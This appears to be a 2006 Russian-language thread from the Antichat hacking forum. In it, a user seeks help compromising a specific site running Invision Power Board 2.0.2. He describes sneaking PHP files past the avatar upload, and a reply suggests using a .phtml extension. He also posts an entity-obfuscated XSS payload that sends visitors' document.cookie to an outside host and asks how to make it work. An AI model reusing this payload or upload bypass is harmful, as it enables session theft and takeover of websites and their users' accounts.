Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Как переименовывается файл после загрузки в uploads в IPB_2.*? |
26.01.2006, 06:31
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
Как переименовывается файл после загрузки в uploads в IPB_2.*?
Второй день мучаю IPB_2.0.2. Движок пропатчен и rst сплоиты идут лесом. Нашёл два реальных пути. Во-первых, разрешена загрузка файлов на сервере(./uploads/). Туда сэйвиться всё: аватарки(av-54.jpg), фотки (photo-32.jpg), и прочие файлы. Косяк в том, что остальные файлы доступны не по прямой ссылки, а через sql-запрос. Не смог найти идентичных исходников. Подскажите, как будет переименовываться файл после загрузки. Кстати, аватара пропускает *.php формат, но переименовывает его в *.txt. Однако сайтик без багов и переименовать в php не выходит...
Во-вторых, естественно, есть XCC. Хтмл на сайтике включен. Однако пропарсив античат нашел сплоиты конечно лишь для более поздних версий от Белого Джордана. Слегка переделав, почти получил раб.вариант, но откудато в конце кода выползают символы '> и кайф обламывается. Посоветуйте, как их убрать.
Последний раз редактировалось Elekt; 26.01.2006 в 07:02..
|
|
|
26.01.2006, 08:34
|
|
Познающий
Регистрация: 10.11.2005
Сообщений: 75
Провел на форуме:
367531
Репутация:
4
|
|
Значит, чтобы убрать лишние символы, бб тегами сделай код максимально маленьким и цветом фона. А по поводу заливки, попробуй загружать не php, а PHTML, что сервером должно обрабатываться как php. Репу, если помог  ) |
|
|
|
26.01.2006, 19:20
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
Не всё так просто. Вот код, шифрован по полной(звездочки убрать):
Код:
[post=1000[topic=wj STy*Le=backgro*und&#*58;&#*117;&#*114;&#*108;&#*40;&#*106;&#*97;&#*118;&#*97;&#*115;&#*99;&#*114;&#*105;&#*112;&#*116;&#*58;&#*100;&#*111;&#*99;&#*117;&#*109;&#*101;&#*110;&#*116;&#*46;&#*105;&#*109;&#*97;&#*103;&#*101;&#*115;&#*91;&#*49;&#*93;&#*46;&#*115;&#*114;&#*99;&#*61;&#*34;&#*104;&#*116;&#*116;&#*112;&#*58;&#*47;&#*47;&#*97;&#*110;&#*116;&#*105;&#*99;&#*104;&#*97;&#*116;&#*46;&#*114;&#*117;&#*47;&#*99;&#*103;&#*105;&#*45;&#*98;&#*105;&#*110;&#*47;&#*115;&#*46;&#*106;&#*112;&#*103;&#*63;&#*34;+document.cookie);/**/] [/topic]] [/post]
...причем при обработке он недействует, но и не отображается....
Вот что получается при его обработке хтмл:
Код:
<a href='index.php?showtopic=wj style=background&#*58;&#*117;&#*114;&#*108;&#*40;&#*106;&#*97;&#*118;&#*97;&#*115;&#*99;&#*114;&#*105;&#*112;&#*116;&#*58;&#*100;&#*111;&#*99;&#*117;&#*109;&#*101;&#*110;&#*116;&#*46;&#*105;&#*109;&#*97;&#*103;&#*101;&#*115;&#*91;&#*49;&#*93;&#*46;&#*115;&#*114;&#*99;&#*61;&#*34;&#*104;&#*116;&#*116;&#*112;&#*58;&#*47;&#*47;&#*97;&#*110;&#*116;&#*105;&#*99;&#*104;&#*97;&#*116;&#*46;&#*114;&#*117;&#*47;&#*99;&#*103;&#*105;&#*45;&#*98;&#*105;&#*110;&#*47;&#*115;&#*46;&#*106;&#*112;&#*103;&#*63;&#*34;+document.cookie);/**/'> </a>'>
... вот и проблема, если он исчезает, но не работает, в чём дело? Проверял на АЕ и Опере - одинаково. Причем, откуда беруться последние два символа, я не знаю(и их видно).
Последний раз редактировалось Elekt; 26.01.2006 в 19:23..
|
|
|
|
26.01.2006, 20:38
|
|
Участник форума
Регистрация: 25.12.2005
Сообщений: 146
Провел на форуме:
123219
Репутация:
36
|
|
а PHTML, что сервером должно обрабатываться как php. Репу, если помог
А вот это не есть факт...
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
